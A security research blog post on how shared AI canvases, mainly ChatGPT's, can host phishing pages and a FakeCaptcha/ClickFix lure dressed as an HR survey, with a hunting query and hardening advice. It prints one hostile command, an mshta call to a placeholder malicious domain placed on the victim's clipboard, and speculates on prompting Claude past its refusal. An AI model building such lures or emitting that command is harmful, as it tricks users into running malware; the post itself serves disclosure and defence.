From Helper to Adversary: The Dual-Use Risks of AI Canvases

Adversaries are becoming more creative by the day, constantly seeking new ways to misuse emerging technologies. That’s why the Eye Security Research team set out to investigate a potential attack vector that, to our knowledge, has not yet been observed in the wild.

Back in October 2024, ChatGPT introduced a feature called canvas, enabling users to create interactive React or HTML projects directly within the platform. While this functionality opens exciting possibilities for developers, it also raises an important question: could threat actors misuse these canvases for malicious purposes, such as hosting clickjacking or phishing attacks?

Since we haven’t seen any real-world cases or public reports of adversaries exploiting ChatGPT canvases, we approached this as a hypothetical threat-hunting exercise. In this article, we take you behind the scenes of our research journey, exploring what is possible, what is not, and how this feature could potentially be weaponised if left unchecked.

How a Simple Shared Link Led Us to a Bigger Security Question

Before diving into the attack scenario, let’s explain how we arrived at this hypothesis. It all started with a Huntress report of macOS malware spreading through SEO poisoning, where the top Google result was a shared ChatGPT link. This raised an important question: which online AI platforms allow users to share content publicly? Our investigation led us to several platforms with sharing capabilities, but are not limited to:

DeepseekAI
Claude.ai
ChatGPT
Google Gemini (formerly Google Bard)
Grok

Next, we wanted to know if users actually share these links via email or through any other platform. To our surprise, they do and quite frequently. While digging deeper, we stumbled upon a shared canvas. Visiting this link revealed something interesting. Users were sending HR surveys and alike through these canvases. At first glance, they looked simple and harmless.

But that sparked an idea. What if we could make these canvases more convincing and trick unsuspecting users into executing commands or entering credentials?

We then examined which platforms support canvas creation. Out of the list, only two platforms stood out: ChatGPT and Google Gemini. With this knowledge, we began testing the boundaries, exploring what can and cannot be done with these AI-powered canvases.

Gemini

First, we started with Google Gemini. We gave it a simple prompt:

Generate a login screen

Gemini responded impressively, providing a clean and professional-looking login screen:

Login page for Canvas UI with the slogan 'Turn your ideas into reality.' including fields for email and password, and sign-in options through Google or GitHub. — *Image 1. AI Generated login screen by Gemini*

We almost fell for it ourselves. Before making any modifications, we simply shared the link and copied it over to the target machine. When a link is shared through Google Gemini, it follows this format:

https://gemini.google.com/share/UID

When opened, the user is greeted with a clear warning pop-up:

A warning message indicating the app was created by another person, alerting users to exercise caution and keep personal information private. It includes a button to continue and a suggestion to try Gemini. — *Image 2. User warning that the content was created by a another person*

While we can’t predict the exact behavior of end-users, we suspect this warning is strong enough to make most users close the chat window immediately. Because of this limitation, we decided to move on to our next target: ChatGPT. Let’s see how that platform handles shared canvases.

ChatGPT

When we repeated the same steps with ChatGPT, the results were… disappointing, to say the least. The canvas and login screen it generated lacked almost everything you’d expect from a modern design. The padding was off, the layout felt clunky, and honestly, it looked like something straight out of the 90s.

So we thought: why not combine the strengths of both platforms? That’s exactly what we did. We took the HTML code generated by Gemini and pasted it into ChatGPT to see how it would handle it.

Next, we shared the ChatGPT canvas link, which follows this format:

https://chatgpt.com/canvas/shared/UID

Login screen with a welcome back message, input fields for email and password, and a sign-in button. — *Image 3. ChatGPT shared canvas of a login screen*

However, when the link is opened, the user is not actively prompted that the content was created by someone else. There is a small note at the top indicating that the content was generated by a user. Realistically, however, it is unlikely that most end users would notice or read that.

So, we continued with the experiment: what happens if we try to add a callback domain that sends credentials to an external server outside of ChatGPT’s environment?

We added a simple testing callback to:

https://127.0.0.1/submit

When the user clicks Submit, the form sends a POST request to localhost.

Login form displaying fields for email and password, with a 'Failed to fetch' message and a 'Sign In' button. — *Image 4. User entering credentials*

When the user hits Submit, they are prompted to allow internet access. At this point, a user could simply click Allow, which would send their credentials over the internet through this canvas. However, our hypothesis is that most users will not grant access because of the warning message:

“If you don’t recognize this, don’t allow this app access to the network.”

Pop-up dialog asking for permission to allow network access, showing the message: 'Login Screen is trying to connect to the network.' Includes options to Deny or Allow, and a URL: 'http://127.0.0.1/submit.' — *Image 5.* Warning of the external connection

Since credential phishing wasn’t feasible, we decided to try a FakeCaptcha attack. We made a few changes to our code and hosted a FakeCaptcha attack disguised as an HR survey:

Illustration of an employee HR survey verification screen with a checkbox for confirming 'I'm not a robot'. — *Image 6. FakeCaptcha disguised as an HR survey*

We chose the HR survey theme because it is a common scenario, many end users are accustomed to receiving HR-related surveys via email. When the user clicks the checkbox to “verify” their identity, they are prompted with the following:

Screenshot of an employee HR survey verification page with 'I'm not a robot' checkbox and instructions for completing verification steps. — *Image 7. User trying to verify their identity*

Surprisingly, the canvas allows us to copy content directly to the user’s clipboard. When we run Windows + R, we can see the copied command displayed in the dialog box, ready to execute.

mshta.exe https://<MALICOUSDOMAIN.TLD> # ✅ 'I am not a robot - reCAPTCHA Verification ID: 2101'

Screenshot of an Employee HR Survey verification step, featuring instructions to verify identity by following three steps on a Windows computer. — *Image 8. Run box with the copied content from the ChatGPT canvas*

As we can see, the attack worked.

FakeCaptcha remains one of the most prevalent attack techniques we observed in 2025, a trend supported by the Global Threat Report from CrowdStrike. In this case, we used the Canvas functionality within ChatGPT to execute the attack scenario successfully.

We reported this feature to OpenAI, highlighting its potential for malicious misuse. OpenAI reviewed the report through their bug bounty program and concluded that it falls outside their scope, as the issue relates to phishing rather than a technical vulnerability.

Noteworthy canditate – Claude.ai

Claude is another noteworthy candidate for this hypothetical attack because of its Artifacts feature. Artifacts allow you to host and run code directly within the platform. However, there’s an important caveat: Claude doesn’t let you freely edit the code yourself. Instead, you must prompt Claude to make any changes.

When we attempted the same attack, Claude immediately scanned our code for malicious patterns and refused to modify it in a way that would enable hosting something harmful. This proactive security measure is commendable. That said, we believe that with enough persistence and creative prompting, it might still be possible to trick Claude into generating or hosting malicious code.

Key takeaways

This experiment highlights a critical point. Platforms that allow public hosting and sharing of adjustable frontends, such as JSFiddle or emerging code-sharing services, offer convenience and creativity. But they also introduce significant security risks.

The concern is not limited to ChatGPT but applies broadly to any service enabling public HTML sharing without clear warnings or safeguards. Features like link sharing and interactive code execution must be carefully designed to prevent misuse and protect users.

Hunting Methodology

To identify shared links originating from messaging platforms such as Outlook or WhatsApp, you can use the following LogScale (CrowdStrike NG-SIEM) query. This query focuses on detecting browser processes that executed commands containing specific URLs and filters for domains and paths of interest:

#event_simpleName=ProcessRollup2 ImageFileName=/(\/|\\)(?<ChildFileName>\w*\.?\w*)$/ ChildFileName=/(chrome|firefox|iexplore|msedge|opera|brave|browser|DuckDuckGo|zen)\.exe/i CommandLine=/https:\/\/(?<Domain>[^\/]+)(?<Path>\/[^\s]+)/ 
| Url := format("https://%s%s", field=["Domain", "Path"])
| in(field="Domain", values=["chatgpt.com", "grok.com", "chat.deepseek.com","gemini.google.com", "claude.ai"])
| in(field=Path, values=[*share*, "*artifacts*"])
| ExecutionChain:=format(format="%s\n\t└ %s (%s)", field=[ParentBaseFileName, FileName, RawProcessId])
| table([@timestamp, ComputerName, ExecutionChain, Url, UserName, TargetProcessId, cid, aid])

Explanation of the Query

This LogScale query is designed to hunt for processes that opened URLs from specific domains and paths using common web browsers. Here’s what each part does:

#event_simpleName=ProcessRollup2
Filters for process-related events.
ImageFileName=/(\/|\\)(?P<ChildFileName>\w*\.?\w*)$/ Extracts the executable name from the process path.
ChildFileName=/(chrome|firefox|iexplore|msedge|opera|brave|browser|DuckDuckGo|zen)\.exe/i
Matches common browser executables (case-insensitive) in this case Google Chrome, Firefox, Microsoft Edge, Opera Browser, Yandex Browser, DuckDuckGo and the Zen Browser.
CommandLine=/https:\/\/(?P<Domain>[^\/]+)(?P<Path>\/[^\s]+)/ Captures URLs from the command line, splitting them into Domain and Path.
Url := format("https://%s%s", field=["Domain", "Path"]) Reconstructs the full URL from captured parts.
in(field="Domain", values=[...]) Filters for specific domains (e.g., AI chat platforms like ChatGPT, Claude, Gemini).
in(field=Path, values=["*share*", "*artifacts*"]) Filters for paths indicating shared content or artifacts.
ExecutionChain := format(...) Creates a readable chain showing parent and child processes.
table([...]) Displays relevant fields such as timestamp, computer name, execution chain, URL, username, and process IDs.

How to protect against this attack

There are a number of measures you can take to better protect against this type of attack. Below are the most effective ones.

Launch regular user awareness & phishing simulations

It is crucial for organisations to create a culture of security awareness. Train users how to recognise FakeCaptcha attacks or malicious webpages.

Deploy endpoint detection and response (EDR)

Not all EDRs are great at detecting ClickFix attacks. An adversary that has taken the trouble of creating this attack would be unlikely to rely on easily detectable commodity malware. Therefore, it is important for organisations to have a well-configured EDR solution, such as the market-leading CrowdStrike Falcon, Defender for Endpoint (P2) or SentinelOne. Even for a sophisticated attack, the threat actor’s actions will result in behaviours that trigger alerts. It is also important to adress that the EDR has to be deployed on as many systems as possible for effective protection.

Investigate all alerts

When an EDR generates an alert, it is important for an expert security operations (SecOps) analyst to investigate it. Follow-up is necessary to investigate what happened, how it occurred, how to prevent it, and how to remove any remnants of the action/infection. If no one investigated, the infected endpoint would not be discovered. It is not unusual for threats to remain undiscovered for weeks, if not months, during which time a threat actor can move further into the network.

Disable run dialog box

The best way to prevent ClickFix attacks is by disabling the run dialog box through Group Policies or through the registry key on endpoints. For the Registry key you can create a NoRun key and set the DWORD value to 1 in HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer. If you want to use a Group Policy go to:

User Configuration > Administrative Templates > Start Menu and Taskbar.
Double-click “Remove Run menu from Start Menu”.
Select Enabled, click Apply, then OK.
Restart your computer for changes to take effect.

Make sure your SIEM system is well configured

A Security Information and Event Management (SIEM) system is a crucial component of any organisation’s cybersecurity strategy. It centralises security data from multiple sources, including endpoints, servers, cloud and applications, to monitor IT infrastructure, detect anomalies in real time, and maintain detailed logs of all events.

A good SIEM can help detect both known and unknown threats, providing fine-grained, real-time visibility into on-premises and cloud-based activities. It uses correlation rules and statistical algorithms to extract actionable information from events and log entries.

There are various SIEMs that already have built-in rules like LogScale, Microsoft Sentinel, ElasticSearch and Splunk.

License a managed detection and response service (MDR)

Deploying tools like a SIEM helps reduce the likelihood of a threat actor progressing their attack once they have successfully compromised an endpoint. However, you still require SecOps experts to make best use of these tools. Many organisations are finding that building a security operations centre (SOC), staffing it, and licensing the tools required is cost-prohibitive. So they turn to third-party managed security services or MDR providers.

MDR services provide organisations of all sizes, across any industry, with a remote SOC staffed by highly skilled SecOps professionals on a 24/7 basis. Their main goal is to monitor specific products in their customers’ infrastructures and detect, respond to, and contain an in-progress cyber attack that has evaded their primary defences.

From Helper to Adversary: The Dual-Use Risks of AI Canvases

How a Simple Shared Link Led Us to a Bigger Security Question

Gemini

ChatGPT

Noteworthy canditate – Claude.ai

Key takeaways

Hunting Methodology

Explanation of the Query

How to protect against this attack

Launch regular user awareness & phishing simulations

Deploy endpoint detection and response (EDR)

Investigate all alerts

Disable run dialog box

Make sure your SIEM system is well configured

License a managed detection and response service (MDR)

Related articles.

Log Poisoning in OpenClaw

AitM Block: Preventing Modern M365 Phishing Attacks

When Updates Backfire: RCE in Windows Update Health Tools

From Helper to Adversary: The Dual-Use Risks of AI Canvases

How a Simple Shared Link Led Us to a Bigger Security Question

Gemini

ChatGPT

Noteworthy canditate – Claude.ai

Key takeaways

Hunting Methodology

Explanation of the Query

How to protect against this attack

Launch regular user awareness & phishing simulations

Deploy endpoint detection and response (EDR)

Investigate all alerts

Disable run dialog box

Make sure your SIEM system is well configured

License a managed detection and response service (MDR)

Related articles.

Log Poisoning in OpenClaw

Microsoft login page abused as phishing redirector

AitM Block: Preventing Modern M365 Phishing Attacks

When Updates Backfire: RCE in Windows Update Health Tools